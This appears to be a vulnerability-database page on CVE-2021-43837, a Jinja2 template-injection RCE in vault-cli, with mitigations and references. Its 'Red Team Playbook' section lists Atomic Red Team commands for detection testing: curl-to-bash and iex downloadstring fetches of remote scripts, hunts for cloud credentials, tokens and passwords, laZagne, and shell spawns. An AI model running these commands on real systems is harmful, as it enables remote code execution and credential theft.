CVE-2021-43837
Overview
The vulnerability is a Remote Code Execution (RCE) caused by unsafe template rendering in the vault-cli tool prior to version 3.0.0. The root cause is the use of Jinja2 templating engine to interpret secret values prefixed with '!template!', enabling execution of arbitrary code embedded in templates. This affects the vault-cli's secret rendering feature that processes templated secrets fetched from Hashicorp Vault.
Vulnerability Description
vault-cli is a configurable command-line interface tool (and python library) to interact with Hashicorp Vault. In versions before 3.0.0 vault-cli features the ability for rendering templated values. When a secret starts with the prefix `!template!`, vault-cli interprets the rest of the contents of the secret as a Jinja2 template. Jinja2 is a powerful templating engine and is not designed to safely render arbitrary templates. An attacker controlling a jinja2 template rendered on a machine can trigger arbitrary code, making this a Remote Code Execution (RCE) risk. If the content of the vault can be completely trusted, then this is not a problem. Otherwise, if your threat model includes cases where an attacker can manipulate a secret value read from the vault using vault-cli, then this vulnerability may impact you. In 3.0.0, the code related to interpreting vault templated secrets has been removed entirely. Users are advised to upgrade as soon as possible. For users unable to upgrade a workaround does exist. Using the environment variable `VAULT_CLI_RENDER=false` or the flag `--no-render` (placed between `vault-cli` and the subcommand, e.g. `vault-cli --no-render get-all`) or adding `render: false` to the vault-cli configuration yaml file disables rendering and removes the vulnerability. Using the python library, you can use: `vault_cli.get_client(render=False)` when creating your client to get a client that will not render templated secrets and thus operates securely.
Impact
An attacker with the ability to manipulate secret values stored in Hashicorp Vault can execute arbitrary code on any system running vulnerable vault-cli versions when those secrets are rendered. This requires the attacker to have write access to secrets or the vault-cli user to fetch and render the malicious secret. The impact includes remote code execution with high privileges due to the client-side execution context, enabling potential data compromise, lateral movement, or system takeover. The CVSS vector indicates the attack requires adjacent network access (AV:A), low attack complexity (AC:L), and high privileges (PR:H) but no user interaction (UI:N).
Solution
Users should upgrade vault-cli to version 3.0.0 or later, where the templated secret rendering feature has been removed, as detailed in the vendor advisory https://github.com/peopledoc/vault-cli/security/advisories/GHSA-q34h-97wf-8r8j. For users unable to upgrade immediately, the vulnerability can be mitigated by disabling template rendering using the environment variable VAULT_CLI_RENDER=false, the command-line flag --no-render (e.g., 'vault-cli --no-render get-all'), or by setting 'render: false' in the vault-cli configuration YAML file. Python library users can disable rendering by calling vault_cli.get_client(render=False).
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the command-line interface tool for interacting with Hashicorp Vault arises from its handling of templated values. Specifically, when a secret is prefixed with `!template!`, the tool interprets the subsequent content as a Jinja2 template. Jinja2 is a powerful templating engine widely used in various applications, but it is not inherently secure for rendering arbitrary templates, particularly when the source of the template content cannot be fully trusted. This flaw allows an attacker who can manipulate the secret values stored in the vault to execute arbitrary code on the machine where the tool is running, leading to a significant risk of Remote Code Execution (RCE).
The attack vectors for exploiting this vulnerability are varied and can be executed in several scenarios. An attacker could compromise the integrity of the secrets stored in the vault, either by gaining unauthorized access or through social engineering tactics that manipulate trusted users into providing access. Once they have control over a secret that is rendered as a Jinja2 template, they can craft malicious payloads that, when executed, can perform a wide range of harmful actions, including data exfiltration, system manipulation, or lateral movement within the network. This risk is particularly pronounced in environments where vault secrets are used to manage sensitive configurations or credentials, as the consequences of successful exploitation can be severe.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Hashicorp Vault for managing sensitive information. The potential for arbitrary code execution poses a critical business risk, as it could lead to data breaches, loss of intellectual property, or even complete system compromise. Organizations that fail to address this vulnerability may find themselves exposed to regulatory penalties, reputational damage, and financial losses. Moreover, the existence of this flaw underscores the importance of trust in the security of templated values, which, if compromised, can lead to cascading failures in security protocols across the organization.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the latest version of the tool, where the problematic code has been removed. For those unable to upgrade immediately, there are effective workarounds available. Disabling the rendering of templates by using the environment variable `VAULT_CLI_RENDER=false`, the flag `--no-render`, or modifying the configuration file to include `render: false` can significantly reduce the risk. Additionally, when utilizing the Python library, ensuring that the client is instantiated with `render=False` can help maintain security. Regular security assessments, code reviews, and monitoring for unauthorized access attempts are also critical components of a comprehensive security strategy to mitigate the risks associated with this vulnerability.
In conclusion, the vulnerability within the command-line interface for Hashicorp Vault highlights the complexities and risks associated with template rendering in security-sensitive applications. Organizations must remain vigilant, ensuring they have robust security measures in place to protect against potential exploitation. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better safeguard their systems and sensitive data against the threats posed by this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vault-Cli Project | Vault-Cli | All |
cpe:2.3:a:vault-cli_project:vault-cli:*:*:*:*:*:python:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-43837 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/peopledoc/vault-cli/security/advisories/GHSA-q34h-97wf-8r8j |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/peopledoc/vault-cli/commit/3ba3955887fd6b7d4d646c8b260f21cebf5db852 |
| podalirius.net |
GitHub CVE
x_refsource_MISC
|
https://podalirius.net/en/publications/grehack-2021-optimizing-ssti-payloads-for-jinja2/ |